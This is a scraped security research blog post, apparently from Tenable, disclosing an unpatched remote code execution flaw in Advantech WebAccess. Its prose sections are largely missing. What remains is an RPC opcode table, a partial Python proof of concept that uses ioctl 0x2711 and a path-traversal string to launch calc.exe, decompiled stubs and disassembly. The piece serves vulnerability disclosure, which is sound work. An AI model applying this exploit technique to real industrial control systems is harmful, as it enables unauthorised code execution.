Advantech WebAccess Unpatched RCE

Author: Chris Lyne

Chris Lyne
Sep 10, 2018 · 9 min read

Summary

Background

Analysis

Image for post
Image for post
WebAccess 8.2_20170817
Image for post
Image for post
WebAccess 8.3.0
Opcode  Address     Function Name
---------------------------------
0x00 0x00401000 sub_401000
0x01 0x00401260 sub_401260
0x02 0x00401420 sub_401420
0x03 0x00401630 sub_401630
0x04 0x004017A0 sub_4017A0
0x05 0x00401970 sub_401970
0x06 0x00401A80 sub_401A80
0x07 0x00401BA0 sub_401BA0
52 print "...2"
53 stubdata = struct.pack("<I", 0x02)
54 res = call(dce, 4, stubdata)
55 if res == -1:
56 print "Something went wrong"
57 sys.exit(1)
58 res = struct.unpack("III", res)
59
60 if (len(res) < 3):
61 print "Received unexpected length value"
62 sys.exit(1)
63
64 print "...3"
65 # ioctl 0x2711
66 stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)
67 command = "..\\..\\windows\\system32\\calc.exe"
68 fmt = "<" + str(0x204) + "s"
69 stubdata += struct.pack(fmt, command)
70 call(dce, 1, stubdata)
Image for post
Image for post
Decompilation with mIDA
{/* opcode: 0x01, address: 0x00401260 */void sub_401260 (
[in] handle_t arg_1,
[in] long arg_2,
[in] long arg_3,
[in] long arg_4,
[in][ref][size_is(arg_4)] char * arg_5,
[out][ref] long * arg_6
);
}
66 stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)
67 command = "..\\..\\windows\\system32\\calc.exe"
68 fmt = "<" + str(0x204) + "s"
69 stubdata += struct.pack(fmt, command)
70 call(dce, 1, stubdata)
Image for post
Image for post
IOCTL Used in Calculation
Image for post
Image for post
10,000 Foot View
Image for post
Image for post
118 Possible Cases
.text:002517B0 ; int __cdecl sub_2517B0(LPSTR lpCommandLine, __int16)
.text:002517B0 sub_2517B0 proc near ; CODE XREF: .text:drawsrv_DsDaqWebService+86p
.text:002517B0
.text:002517B0 ProcessInformation= _PROCESS_INFORMATION ptr -54h
.text:002517B0 StartupInfo= _STARTUPINFOA ptr -44h
.text:002517B0 lpCommandLine= dword ptr 4
.text:002517B0 arg_4= word ptr 8
.text:002517B0
.text:002517B0 sub esp, 54h
.text:002517B3 push edi
.text:002517B4 xor eax, eax
.text:002517B6 mov ecx, 10h
.text:002517BB lea edi, [esp+58h+StartupInfo.lpReserved]
.text:002517BF rep stosd
.text:002517C1 lea eax, [esp+58h+StartupInfo]
.text:002517C5 push eax ; lpStartupInfo
.text:002517C6 mov [esp+5Ch+StartupInfo.cb], 44h
.text:002517CE call ds:GetStartupInfoA
.text:002517D4 mov cx, [esp+58h+arg_4]
.text:002517D9 lea edx, [esp+58h+ProcessInformation]
.text:002517DD push edx ; lpProcessInformation
.text:002517DE lea eax, [esp+5Ch+StartupInfo]
.text:002517E2 push eax ; lpStartupInfo
.text:002517E3 push 0 ; lpCurrentDirectory
.text:002517E5 push 0 ; lpEnvironment
.text:002517E7 push 0 ; dwCreationFlags
.text:002517E9 push 0 ; bInheritHandles
.text:002517EB push 0 ; lpThreadAttributes
.text:002517ED mov [esp+74h+StartupInfo.wShowWindow], cx
.text:002517F2 mov ecx, [esp+74h+lpCommandLine]
.text:002517F6 push 0 ; lpProcessAttributes
.text:002517F8 push ecx ; lpCommandLine
.text:002517F9 push 0 ; lpApplicationName
.text:002517FB call ds:CreateProcessA
[snip]
...
Image for post
Image for post
BinDiff of Function 1
Image for post
Image for post
BinDiff of Function 2
Image for post
Image for post
BinDiff of Function 3
Image for post
Image for post
BinDiff of Function 4
Image for post
Image for post
BinDiff of Function 5

Conclusion

Image for post
Image for post
Summary of Events

Tenable TechBlog

Learn how Tenable finds new vulnerabilities and writes the…

Chris Lyne

Written by

Chris is a security researcher at Tenable, focused on finding 0-day vulnerabilities. He is a former developer and aims to make the cyber world more secure.

Tenable TechBlog

Learn how Tenable finds new vulnerabilities and writes the software to help you find them

Chris Lyne

Written by

Chris is a security researcher at Tenable, focused on finding 0-day vulnerabilities. He is a former developer and aims to make the cyber world more secure.

Tenable TechBlog

Learn how Tenable finds new vulnerabilities and writes the software to help you find them

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch

Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore

Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store